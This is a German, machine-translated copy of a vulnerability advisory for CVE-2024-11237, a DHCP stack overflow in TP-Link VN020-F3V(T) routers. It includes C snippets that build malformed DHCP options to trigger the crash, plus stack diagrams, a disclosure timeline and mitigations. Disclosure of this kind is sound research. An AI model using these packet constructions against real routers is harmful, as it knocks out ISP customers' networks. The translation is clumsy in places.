Startseite>Programmierbezogen>Anderer Quellcode
Herunterladen

TP-Link VN020 DHCP-Speicherbeschäftigung (CVE-2024-11237)

Kritische Anfälligkeit in der DHCP -Paketverarbeitung

Überblick

In TP-Link VN020 F3V (T) -Routern, die die Firmware-Version tt_v6.2.1021 ausführen, wurde eine kritische Sicherheitsanfälligkeit entdeckt. Die Sicherheitsanfälligkeit ermöglicht Remote-Angreifer, einen stapelbasierten Pufferüberlauf durch speziell gefertigte DHCP-Discover-Pakete auszulösen, was zu Bedingungen des Denial of Service (DOS) führt.

Betroffene Geräte:

  • Routermodell: TP-Link VN020-F3V (T)
  • Firmware -Version: TT_V6.2.1021
  • Bereitstellung: vor allem über Tunesie Telecom und Topnet ISPs
  • Bestätigte Varianten: Affekte auch algerische und marokkanische Versionen

Wichtiger Hinweis: Aufgrund des Eigentums der Firmware sind die genauen internen Implementierungsdetails unbekannt. Diese Analyse basiert auf beobachteten Verhalten und Black-Box-Tests.

Sicherheitsdetails

  • CVE ID : CVE-2024-11237
  • Typ : Stack-basierter Pufferüberlauf (CWE-121)
  • Angriffsvektor : Remote (DHCP Discover -Paket)
  • Authentifizierung : Keine erforderlich
  • Port : UDP/67 (DHCP -Server)
  • Auswirkung : DOS (bestätigt) & RCE (möglich)
  • Komplexität : niedrig

Technische Analyse

DHCP -Paketstruktur 

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

Ausbeutungsvektoren

  1. DHCP -Hostname -Verarbeitung 
 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );
  1. Lieferantenspezifische Option 
 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );
  1. Länge Feldmanipulation 
 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

Potenzielle Korruption des Gedächtnisses

Während die genaue interne Implementierung unbekannt ist, schlägt das beobachtete Verhalten potenzielle Probleme bei der Korruption von Gedächtnissen vor:

Normale DHCP -Hostname -Verarbeitung 

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

Was könnte möglicherweise im Router passieren? 

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

Dies ist theoretisch, und bestimmte Details sind möglicherweise nicht ganz genau, da TP-Link die Firmware für diesen Router ausschließlich ISPs zur Verfügung stellt.

Videodemonstration

Poc.mp4
Wireshark.mp4

Router kann auch versuchen, das Selbst neu zu starten, wie hier angezeigt, weil der hier gezeigte Absturz gezeigt wird:

Router_Effect.mp4

Beobachtete Auswirkung

  • Unmittelbares Gerät nicht reagiert
  • DHCP -Dienstfehler
  • Automatischer Router Neustart
  • Netzwerkstörungen, die manuelle Intervention erfordern

Zeitleiste

  • Erste Entdeckung : 20. Oktober 2024
  • Verkäuferbenachrichtigung : 3. November 2024
  • CVE -Aufgabe : 15. November 2024

Minderung

Derzeit ist kein offizieller Patch verfügbar. Temporäre Minderungen umfassen:

  1. Deaktivieren Sie den DHCP -Server, wenn nicht erforderlich
  2. Implementieren Sie die DHCP -Verkehrsfilterung an der Netzwerkkante
  3. Betrachten Sie nach Möglichkeit alternative Routermodelle

Referenzen

  1. CVE-2024-11237
  2. CWE-121: Stack-basierter Pufferüberlauf

Forscher

Mohamed Maatallah

  • Github: @zephkek
  • Zugehörigkeit: Unabhängiger Sicherheitsforscher
Expandieren
Zusätzliche Informationen
Ähnliche Anwendungen
Empfohlen für Sie
Ähnliche Nachrichten Alle